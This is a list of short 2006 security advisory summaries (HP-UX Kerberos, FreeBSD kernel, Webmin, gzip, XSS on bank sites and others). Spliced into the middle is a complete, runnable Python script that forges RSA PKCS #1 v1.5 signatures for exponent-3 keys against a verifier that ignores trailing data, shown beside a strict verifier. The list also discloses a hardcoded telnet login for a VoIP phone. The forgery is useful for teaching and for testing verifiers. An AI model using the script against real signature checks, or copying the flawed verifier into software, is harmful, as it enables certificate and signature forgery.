HPSBUX02152 SSRT5973 rev.1 - HP-UX Kerberos Client Remote Unauthenticated Execution of Arbitrary Code
HPSBUX02155 SSRT061235 rev.1 - HP-UX CIFS Server (Samba) Local Unauthorized Access, Elevated Privileges
wwwthreads 5.4.2 and prior suffer from multiple cross-site scripting vulnerabilities.
PhotoStore suffers from multiple cross-site scripting vulnerabilities.
Opial Audio/Video Download Management suffers from cross-site scripting in index.php.
toendaCMS suffers from a local file inclusion vulnerability.
RISE-2006002: A vulnerability exists in an architecture-dependent function of the FreeBSD kernel (FreeBSD 5.2-RELEASE through FreeBSD 5.5-RELEASE) which, when properly exploited, can lead to local compromise of the vulnerable system. The vulnerability was fixed in FreeBSD 6.0-RELEASE, but the production (legacy) releases 5.2 through 5.5 remain vulnerable.
Mandriva Linux Security Advisory MDKSA-2006:169: A number of security vulnerabilities have been discovered in Mozilla Thunderbird and corrected in version 1.5.0.7.
Mandriva Linux Security Advisory MDKSA-2006:170: Webmin before 1.296 and Usermin before 1.226 do not properly handle a URL containing a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs.
SUSE Security Announcement SUSE-SA:2006:055: If an RSA key with public exponent 3 is used, it may be possible to forge a PKCS #1 v1.5 signature for that key. Implementations may incorrectly accept such a signature, and therefore the certificate carrying it, if they do not check for excess data following the DigestInfo in the RSA exponentiation result.
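The exponent-3 forgery that the SUSE entry above describes, as an added worked example (this is illustrative code written for this page, not OpenSSL's or SUSE's). It shows a verifier that parses the PKCS #1 v1.5 padding from the front and stops once the DigestInfo matches, alongside a correct verifier that rebuilds the whole encoded block and compares it in full. The modulus is a constructed stand-in of the right size: the forgery never touches the private key or the factorisation of n, so a real 2048-bit key with e = 3 behaves identically.

```python
# Added example: PKCS #1 v1.5 signature forgery against an RSA public key with
# e = 3 when the verifier ignores data after the DigestInfo. Illustrative code
# written for this page; not OpenSSL's or SUSE's implementation.
import hashlib
import hmac
import random

# DER-encoded DigestInfo prefix for SHA-1 (RFC 3447, section 9.2, note 1).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info(msg: bytes) -> bytes:
    """DigestInfo = DER prefix || SHA-1(msg), as embedded by EMSA-PKCS1-v1_5."""
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def icbrt(n: int) -> int:
    """Integer cube root rounded down (Newton's method on integers)."""
    x = 1 << ((n.bit_length() + 2) // 3)   # starts at or above the root
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def stand_in_modulus(bits: int = 2048, seed: int = 1) -> int:
    """Constructed 2048-bit odd number standing in for the public modulus.

    The forgery uses only (n, e); it never needs the private key, so any
    modulus of this size demonstrates the effect."""
    rng = random.Random(seed)
    return rng.getrandbits(bits) | (1 << (bits - 1)) | 1


def forge_signature(msg: bytes, n: int) -> int:
    """Return s such that s^3 (with no modular reduction) begins with a
    well-formed-looking EMSA-PKCS1-v1_5 block for msg, followed by garbage."""
    k = (n.bit_length() + 7) // 8
    di = digest_info(msg)
    # Minimal padding: 00 01, eight 0xFF bytes, 00, DigestInfo, then zeros
    # that rounding the cube root is free to overwrite.
    block = (b"\x00\x01" + b"\xff" * 8 + b"\x00" + di).ljust(k, b"\x00")
    m = int.from_bytes(block, "big")
    s = icbrt(m)
    if s ** 3 < m:
        s += 1                       # round up so that s^3 >= m
    # s^3 - m < 3*s^2, which fits inside the zeroed tail, and s^3 < n, so the
    # verifier's s^e mod n is exactly s^3 and the prefix survives intact.
    assert s ** 3 < n
    return s


def _encoded_message(s: int, n: int, e: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    return pow(s, e, n).to_bytes(k, "big")


def weak_verify(msg: bytes, s: int, n: int, e: int = 3) -> bool:
    """Vulnerable verifier: walks the padding from the front and returns as
    soon as the DigestInfo matches, never checking that it ends the block."""
    em = _encoded_message(s, n, e)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return False
    di = digest_info(msg)
    return em[i + 1:i + 1 + len(di)] == di   # BUG: trailing bytes are ignored


def strict_verify(msg: bytes, s: int, n: int, e: int = 3) -> bool:
    """Correct verifier (RFC 3447, section 8.2.2): rebuild the full expected
    encoded message and compare all of it, so no excess data is tolerated."""
    em = _encoded_message(s, n, e)
    di = digest_info(msg)
    expected = b"\x00\x01" + b"\xff" * (len(em) - len(di) - 3) + b"\x00" + di
    return hmac.compare_digest(em, expected)


if __name__ == "__main__":
    n = stand_in_modulus()
    msg = b"constructed sample message"
    s = forge_signature(msg, n)
    print("weak verifier accepts forgery:  ", weak_verify(msg, s, n))
    print("strict verifier accepts forgery:", strict_verify(msg, s, n))
```

The attack works because a 2048-bit modulus leaves about 1680 bits of attacker-controlled tail after a 46-byte prefix, while the rounding error of the cube root is only about 1360 bits wide; with a larger exponent such as 65537 the e-th root rounding error no longer fits, which is why small public exponents are the precondition.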
jevoncms (.inc) suffers from a path disclosure vulnerability.
Plesk 7.5 (and prior) and 7.6 for Windows suffer from an information disclosure vulnerability in the file manager.
MySource Matrix versions 3.8 and below and MySource 2.x may be used as an unauthorized HTTP proxy.
ContentKeeper 123.25 and below suffers from a design flaw in the user administration interface which reveals account passwords inside the HTML source code. Any authenticated user with access to the user administration page may use this information to compromise the accounts on other systems.
Zachary McGrew has discovered and reported that the FiWin SS28S WiFi VoIP SIP/Skype Phone with firmware version 01_02_07 has VxWorks Telnet open with a hardcoded username/password of 1/1. Various debug commands allow viewing SIP credentials, WEP keys, etc. on the phone.
Woltlab Burning Board 2.3.X SQL Injection Vulnerability
APPLE-SA-2006-09-21 AirPort Update 2006-001 and Security Update 2006-005: The security fixes described below are available in AirPort Update 2006-001 and Security Update 2006-005. AirPort Update 2006-001 contains an additional non-security fix to address a reliability issue that occurs on a limited number of MacBook Pro systems.
CAID 34616, 34617, 34618: CA eTrust Security Command Center and eTrust Audit vulnerabilities
During the analysis of RSA Keon Certificate Authority Manager, Arhont Ltd consultants discovered several vulnerabilities in the Log Verification function. A rogue CA (Certificate Authority) administrator, or any local administrative user with access to the CA server, could manipulate the secure logging process to disguise their activities. Versions 6.6 and 6.5.1 are vulnerable.
scip AG Vulnerability ID 2555 (09/21/2006): Sun Secure Global Desktop prior to 4.3, multiple remote vulnerabilities
Commerce Bank's website is susceptible to cross-site scripting.
Several Greek banks suffer from cross-site scripting vulnerabilities.
SUSE-SA:2006:056 - The gzip tool does not handle certain values correctly when unpacking archives. This leads to vulnerabilities such as buffer overflows or infinite loops.
ZDI-06-029: Ipswitch WS_FTP Server Checksum Command Parsing Buffer Overflow Vulnerabilities
rPath Security Advisory 2006-0170-1 - Previous versions of the gzip package contain multiple vulnerabilities that enable user-complicit unauthorized access when a user attempts to gunzip intentionally malformed gzip files. Some network services automatically run the gunzip program in some contexts, which may then enable direct unauthorized access to the user account that provides the network service.